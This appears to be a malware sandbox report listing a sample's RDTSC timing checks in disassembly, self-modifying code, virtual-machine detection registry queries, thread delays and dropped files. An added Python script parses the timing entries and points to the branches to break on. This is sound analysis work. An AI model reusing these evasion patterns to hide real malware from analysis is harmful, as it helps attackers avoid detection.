                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52602EE second address: 5260327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 1Eh 0x00000005 jmp 00007FE311181220h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000014 pushad 0x00000015 mov dx, si 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c popad 0x0000001d je 00007FE383CAF52Bh 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov dx, 1822h 0x0000002a mov si, dx 0x0000002d popad 0x0000002e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5260327 second address: 526032D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526032D second address: 526035D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [esi+44h] 0x0000000e jmp 00007FE311181220h 0x00000013 or edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov cl, dh 0x0000001b popad 0x0000001c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526035D second address: 526037F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526037F second address: 526039C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526039C second address: 52603A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52603A2 second address: 5260476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FE383CAF4F4h 0x0000000e pushad 0x0000000f pushad 0x00000010 mov ebx, 07FD2E16h 0x00000015 call 00007FE311181227h 0x0000001a pop eax 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007FE311181229h 0x00000022 add esi, 02CEA226h 0x00000028 jmp 00007FE311181221h 0x0000002d popfd 0x0000002e popad 0x0000002f test byte ptr [esi+48h], 00000001h 0x00000033 pushad 0x00000034 push eax 0x00000035 pushfd 0x00000036 jmp 00007FE311181223h 0x0000003b sub eax, 06C5255Eh 0x00000041 jmp 00007FE311181229h 0x00000046 popfd 0x00000047 pop esi 0x00000048 pushfd 0x00000049 jmp 00007FE311181221h 0x0000004e xor eax, 77875396h 0x00000054 jmp 00007FE311181221h 0x00000059 popfd 0x0000005a popad 0x0000005b jne 00007FE383CAF44Eh 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 movsx edx, cx 0x00000067 popad 0x00000068 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280ADD second address: 5280B12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b movsx ebx, si 0x0000000e pushfd 0x0000000f jmp 00007FE310CDC3A4h 0x00000014 sub si, 6648h 0x00000019 jmp 00007FE310CDC39Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280B12 second address: 5280B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280B18 second address: 5280B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE310CDC3A9h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE310CDC39Dh 0x00000019 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280B53 second address: 5280B65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280B65 second address: 5280B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280B69 second address: 5280B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280B6D second address: 5280B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280B73 second address: 5280C49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181223h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d push esi 0x0000000e call 00007FE31118121Bh 0x00000013 pop ecx 0x00000014 pop edi 0x00000015 mov dh, cl 0x00000017 popad 0x00000018 push ebp 0x00000019 jmp 00007FE31118121Eh 0x0000001e mov dword ptr [esp], ebx 0x00000021 jmp 00007FE311181220h 0x00000026 xchg eax, esi 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007FE31118121Ch 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 mov ax, 9F17h 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FE311181223h 0x0000003e adc ax, 141Eh 0x00000043 jmp 00007FE311181229h 0x00000048 popfd 0x00000049 pushfd 0x0000004a jmp 00007FE311181220h 0x0000004f sub esi, 30089A18h 0x00000055 jmp 00007FE31118121Bh 0x0000005a popfd 0x0000005b popad 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FE311181225h 0x00000064 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0938 second address: 52C096F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FE31118121Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx ecx, di 0x00000016 movsx ebx, cx 0x00000019 popad 0x0000001a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C096F second address: 52C0993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE310CDC3A0h 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0993 second address: 52C09A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C09A2 second address: 52C09BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE310CDC3A4h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C09BA second address: 52C0A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b jmp 00007FE311181227h 0x00000010 mov dword ptr fs:[00000000h], eax 0x00000016 jmp 00007FE311181226h 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e jmp 00007FE311181220h 0x00000023 mov eax, dword ptr [esi+10h] 0x00000026 pushad 0x00000027 pushad 0x00000028 call 00007FE31118121Ch 0x0000002d pop ecx 0x0000002e popad 0x0000002f jmp 00007FE31118121Eh 0x00000034 popad 0x00000035 test eax, eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FE311181227h 0x0000003e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0A48 second address: 52C0A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE310CDC3A4h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0A60 second address: 52C0A7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FE383BE04C9h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0A7C second address: 52C0AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FE310CDC3A1h 0x0000000a add si, CDF6h 0x0000000f jmp 00007FE310CDC3A1h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0AAA second address: 52C0AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0AB0 second address: 52C0AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0AB4 second address: 52C0AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0AB8 second address: 52C0B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d jmp 00007FE310CDC3A4h 0x00000012 mov dword ptr [ebp-20h], eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FE310CDC39Eh 0x0000001c sbb si, 8178h 0x00000021 jmp 00007FE310CDC39Bh 0x00000026 popfd 0x00000027 call 00007FE310CDC3A8h 0x0000002c mov edi, eax 0x0000002e pop ecx 0x0000002f popad 0x00000030 mov ebx, dword ptr [esi] 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FE310CDC3A3h 0x00000039 adc ecx, 23D46E9Eh 0x0000003f jmp 00007FE310CDC3A9h 0x00000044 popfd 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FE310CDC39Eh 0x0000004c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0445 second address: 52A0449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0449 second address: 52A044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A044F second address: 52A0466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE311181223h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0466 second address: 52A04EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 pushfd 0x00000011 jmp 00007FE310CDC3A8h 0x00000016 and esi, 339D6D88h 0x0000001c jmp 00007FE310CDC39Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FE310CDC39Bh 0x0000002e and eax, 0CF7F1CEh 0x00000034 jmp 00007FE310CDC3A9h 0x00000039 popfd 0x0000003a mov di, cx 0x0000003d popad 0x0000003e rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: 2B2E01 second address: 2B2E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRDTSC instruction interceptor: First address: 43061A second address: 43066A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c ja 00007FE310CDC396h 0x00000012 jmp 00007FE310CDC3A1h 0x00000017 jmp 00007FE310CDC3A7h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jne 00007FE310CDC396h 0x00000025 rdtsc
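Each entry above is one window between two executed RDTSC instructions, and the code between the pair is register shuffling, pushfd/popfd and short jumps that do no useful work: the classic shape of a protector timing how long instrumented code takes to run. The Python script below is an added example, not part of the Joe Sandbox report or of the sample, that turns such entries into a per-process summary: how many windows were hit, the longest run of back-to-back windows (one ending where the next begins), how much padding sits inside each window, and which windows contain a conditional branch, which is where the measured cycle delta is actually acted on. The constructed sample is a subset of the entries above; the line-matching regex tolerates both the fused and the separated forms of the "Source" column, and the metrics are the example's own choice.

```python
"""Summarise Joe Sandbox 'RDTSC instruction interceptor' entries per process."""
import re
from collections import defaultdict

# Constructed sample: entries copied verbatim from the report above.
SAMPLE = r"""
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | RDTSC instruction interceptor: First address: 52C06F7 second address: 52C0721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FE31118121Ch 0x0000000f push eax 0x00000010 jmp 00007FE31118121Bh 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov cl, bl 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | RDTSC instruction interceptor: First address: 52C0721 second address: 52C0726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | RDTSC instruction interceptor: First address: 52C0726 second address: 52C072C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | RDTSC instruction interceptor: First address: 52C0A60 second address: 52C0A7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FE383BE04C9h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | RDTSC instruction interceptor: First address: 52C0A7C second address: 52C0AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FE310CDC3A1h 0x0000000a add si, CDF6h 0x0000000f jmp 00007FE310CDC3A1h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | RDTSC instruction interceptor: First address: 2B2E01 second address: 2B2E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | RDTSC instruction interceptor: First address: 43061A second address: 43066A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c ja 00007FE310CDC396h 0x00000012 jmp 00007FE310CDC3A1h 0x00000017 jmp 00007FE310CDC3A7h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jne 00007FE310CDC396h 0x00000025 rdtsc
"""

# Accepts "…exeRDTSC instruction…" (fused) as well as "…exe | RDTSC instruction…".
ENTRY_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*RDTSC instruction interceptor:\s*"
    r"First address:\s*(?P<first>[0-9A-Fa-f]+)\s+second address:\s*(?P<second>[0-9A-Fa-f]+)"
    r"\s+instructions:\s*(?P<body>.+?)\s*$"
)
# Each instruction in the listing is preceded by its window offset, e.g. "0x0000000a".
OFFSET_RE = re.compile(r"\s*0x[0-9A-Fa-f]{8}\s+")


def split_instructions(body):
    """'0x00000000 rdtsc 0x00000002 pop edx ...' -> ['rdtsc', 'pop edx', ...]"""
    return [part.strip() for part in OFFSET_RE.split(body) if part.strip()]


def is_conditional_branch(insn):
    """jne/ja/jb/... consume the measured delta; an unconditional jmp is just padding."""
    mnemonic = insn.split()[0].lower()
    return mnemonic.startswith("j") and mnemonic != "jmp"


def parse_windows(text):
    windows = []
    for line in text.splitlines():
        m = ENTRY_RE.search(line)
        if not m:
            continue
        insns = split_instructions(m.group("body"))
        windows.append({
            "process": m.group("proc").rsplit("\\", 1)[-1],
            "first": int(m.group("first"), 16),
            "second": int(m.group("second"), 16),
            "inner": insns[1:-1],  # everything between the opening and closing rdtsc
            "branches": [i for i in insns if is_conditional_branch(i)],
        })
    return windows


def summarize(windows):
    """Per-process counts; windows chain when one ends at the address the next starts."""
    per_proc = defaultdict(lambda: {"windows": 0, "longest_chain": 0, "branch_windows": 0,
                                    "padding_insns": 0, "max_padding": 0})
    last_end, run = {}, defaultdict(int)
    for w in windows:
        p, s = w["process"], per_proc[w["process"]]
        s["windows"] += 1
        s["padding_insns"] += len(w["inner"])
        s["max_padding"] = max(s["max_padding"], len(w["inner"]))
        s["branch_windows"] += 1 if w["branches"] else 0
        run[p] = run[p] + 1 if last_end.get(p) == w["first"] else 1
        s["longest_chain"] = max(s["longest_chain"], run[p])
        last_end[p] = w["second"]
    return dict(per_proc)


if __name__ == "__main__":
    for proc, stats in summarize(parse_windows(SAMPLE)).items():
        print(proc, stats)
```

Run against the full listing, the interesting numbers are the chain length (how many timing windows the protector strings together before it trusts the result) and the small number of windows that carry a `jne`/`ja`: those are the places to break on when stepping the sample past the check.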
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Special instruction interceptor: First address: 272E28 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Special instruction interceptor: First address: 418EA2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Special instruction interceptor: First address: 445BD8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Special instruction interceptor: First address: 272D50 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Special instruction interceptor: First address: 4AF6A5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Special instruction interceptor: First address: 418370 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 2B2E28 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 458EA2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 485BD8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 2B2D50 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 4EF6A5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 458370 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | Special instruction interceptor: First address: 417E2A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | Special instruction interceptor: First address: 5B983A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | Special instruction interceptor: First address: 5E1DF8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | Special instruction interceptor: First address: 5C9717 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | Special instruction interceptor: First address: 641C4A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE | Special instruction interceptor: First address: 1E2E28 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE | Special instruction interceptor: First address: 388EA2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE | Special instruction interceptor: First address: 3B5BD8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE | Special instruction interceptor: First address: 1E2D50 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE | Special instruction interceptor: First address: 41F6A5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE | Special instruction interceptor: First address: 388370 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Special instruction interceptor: First address: 3458CB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Special instruction interceptor: First address: 513D1C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Special instruction interceptor: First address: 573A45 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | Memory allocated: F30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | Memory allocated: 2C80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | Memory allocated: 2AC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Code function: 0_2_052F0000 rdtsc 0_2_052F0000
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 547
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1225
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1178
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1241
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1217
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1234
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Window / User API: threadDelayed 9583
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | Window / User API: threadDelayed 1933
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe | Window / User API: threadDelayed 3133
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4797
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3896
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4111
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2530
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2378
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3727
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 577
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4092
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\api-ms-win-core-memory-l1-1-0.dll
